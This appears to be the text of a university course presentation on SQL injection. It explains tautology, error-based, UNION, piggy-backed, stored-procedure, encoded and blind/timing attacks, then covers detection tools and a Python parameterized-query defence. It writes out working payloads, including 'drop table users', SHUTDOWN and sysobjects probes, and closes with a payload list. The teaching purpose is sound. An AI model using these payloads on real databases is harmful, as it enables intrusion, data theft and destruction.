SQL Injection Attack


DESCRIPTION

SQL Injection Attack. Database Security course project. Instructor: Dr. Jalili. Presenters: Sajedeh Harraz, Narges Yousefnejad. Table of contents: 1. Definition of SQL Injection Attack. 2. WEB APPLICATION architecture. 3. Types of SQLIA. 4. SQLIA prevention and detection methods. - PowerPoint PPT Presentation

Table of contents:
1. Definition of SQL Injection Attack
2. WEB APPLICATION architecture
3. Types of SQLIA
4. SQLIA prevention and detection methods

Definition of SQLIA (OWASP)

WEB APPLICATION architecture

Types of SQLIA:
Tautologies
Illegal/Logically Incorrect Queries
Union Query
Piggy-Backed Queries
Stored Procedures
Inference
Alternate Encodings

Tautologies attack

Query after injection:
SELECT * FROM user WHERE id = 1 or 1 = 1 AND password = 1111

Illegal/Logically Incorrect Queries attack

Value injected into the pin field:
convert(int,(select top 1 name from sysobjects where xtype='u'))

Query built at the CGI layer:
SELECT accounts FROM users WHERE login='' AND pass='' AND pin= convert(int,(select top 1 name from sysobjects where xtype='u'))

Error returned by SQL Server:
"Microsoft OLE DB Provider for SQL Server (0x80040E07) Error converting nvarchar value 'CreditCards' to a column of data type int."

What the attacker learns from the error message:
1- The database is SQL Server.
2- A table named CreditCards exists.

Union Query attack

Vulnerable PHP code:
$sqlquery = "SELECT * From news WHERE id =$id";
$process = odbc_exec($sqlconnect, $sqlquery);
echo odbc_result($process, 2);

Value injected into id:
1 and 1=0 union select 1,@@version,3 --

Resulting query:
SELECT * From news WHERE id = 1 and 1=0 union select 1,@@version,3 --

Piggy-Backed Queries attack

Value injected into pass:
'; drop table users --

Resulting query:
SELECT accounts FROM users WHERE login='doe' AND pass=''; drop table users -- ' AND pin=123

Result: the users table is dropped.

Stored Procedures attack

Vulnerable stored procedure:
CREATE PROCEDURE DBO.isAuthenticated
  @userName varchar2, @pass varchar2, @pin int
AS
  EXEC("SELECT accounts FROM users WHERE login='" + @userName + "' and pass='" + @pass + "' and pin=" + @pin);
GO

Value injected into pass:
'; SHUTDOWN; --

Resulting query:
SELECT accounts FROM users WHERE login='doe' AND pass=''; SHUTDOWN; -- ' AND pin=

Alternate Encodings attack

Value injected into login:
legalUser'; exec(char(0x73687574646f776e)) --

Resulting query:
SELECT accounts FROM users WHERE login='legalUser'; exec(char(0x73687574646f776e)) -- ' AND pass=

char(0x73687574646f776e) decodes to the string "shutdown", so the encoded command shuts the server down.

Inference attack

1- Blind Injection: the attacker asks true/false questions through the injected condition.
1- SELECT accounts FROM users WHERE login='legalUser' and 1=0 -- ' AND pass='' AND pin=0
2- SELECT accounts FROM users WHERE login='legalUser' and 1=1 -- ' AND pass='' AND pin=0
If the login field is injectable, the first query (1=0) fails to log in while the second (1=1) succeeds; if the application is secure, both return a login error.

2- Timing Attack: the response time of the query reveals the answer.
SELECT accounts FROM users WHERE login='legalUser' and ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 -- ' AND pass='' AND pin=0

SQLIA prevention and detection methods:
WAVES (uses a web crawler)
JDBC-Checker
AMNESIA
SQL DOM and Safe Query Objects (query-building API)
Valeur et al. (subject to false positives and false negatives)
Security Gateway proxy (configured with SPDL)
SQLrand (SQL proxy)

Countermeasures:
CODE SECURELY
MONITOR FOR ATTACKS
BLOCK ATTACKS

CODE SECURELY (examples in Perl, Java, VB.NET)
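The concatenated-query pattern behind the slides' examples (the `id=$id` PHP snippet and the `login='...' AND pass='...' AND pin=...` queries) beside the parameterized form that the CODE SECURELY slides call for, as an added example that is not from the presentation. It uses Python's sqlite3 instead of the deck's Perl/Java/VB.NET, and the users table, its rows, and the helper names are constructed here for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample table for this example (not data from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (login TEXT, pass TEXT, pin INTEGER, accounts TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [("doe", "secret", 123, "ACC-001"), ("legalUser", "hunter2", 0, "ACC-002")],
    )
    return conn


def lookup_vulnerable(conn, login, pw, pin):
    """Builds the query by string concatenation, the pattern every SQLIA
    type on the slides exploits. Returns the list of matching accounts."""
    sql = (
        "SELECT accounts FROM users WHERE login='" + login
        + "' AND pass='" + pw
        + "' AND pin=" + pin
    )
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, login, pw, pin):
    """Same lookup with bound parameters: input reaches the driver as values,
    never as SQL text, so quotes, comments and UNION inside it are matched
    literally. The pin is validated as an integer before it is bound, so a
    non-numeric pin raises ValueError instead of reaching the database."""
    sql = "SELECT accounts FROM users WHERE login=? AND pass=? AND pin=?"
    return [row[0] for row in conn.execute(sql, (login, pw, int(pin)))]


# Login-field payloads in the style of the slides: a tautology, and a UNION
# that pulls the database version (sqlite_version() stands in for @@version).
TAUTOLOGY = "' or 1=1 --"
UNION_VERSION = "' union select sqlite_version() --"


def compare(payload):
    """Run one injected login value through both lookups with an empty
    password and pin 0; returns (rows_vulnerable, rows_parameterized)."""
    conn = make_db()
    return (
        lookup_vulnerable(conn, payload, "", "0"),
        lookup_parameterized(conn, payload, "", "0"),
    )


if __name__ == "__main__":
    for name, payload in (("tautology", TAUTOLOGY), ("union", UNION_VERSION)):
        vuln, safe = compare(payload)
        print(f"{name:10s} vulnerable -> {vuln}   parameterized -> {safe}")
```

Against the vulnerable lookup the tautology returns every account and the UNION returns the server version; the parameterized lookup returns nothing for either, because the whole payload is compared as a login string. The `int(pin)` conversion is the second half of the defence: bind parameters stop SQL from being spliced in, and type validation rejects input that does not fit the column at all.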

MONITOR FOR ATTACKS
Network IDS (NIDS): pattern matching, e.g. Snort regular-expression rules
Host IDS (HIDS)
Application IDS (AppIDS)

BLOCK ATTACKS
Application firewalls
Web-application firewalls
IDS
SSL
Cisco Application Velocity System (AVS) (built-in)
ModSecurity


Questions?

Example payloads from the slides:
or 1=1 --
Select @@version
) or 1 = 1 --
ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 --
exec(0x73687574646f776e) --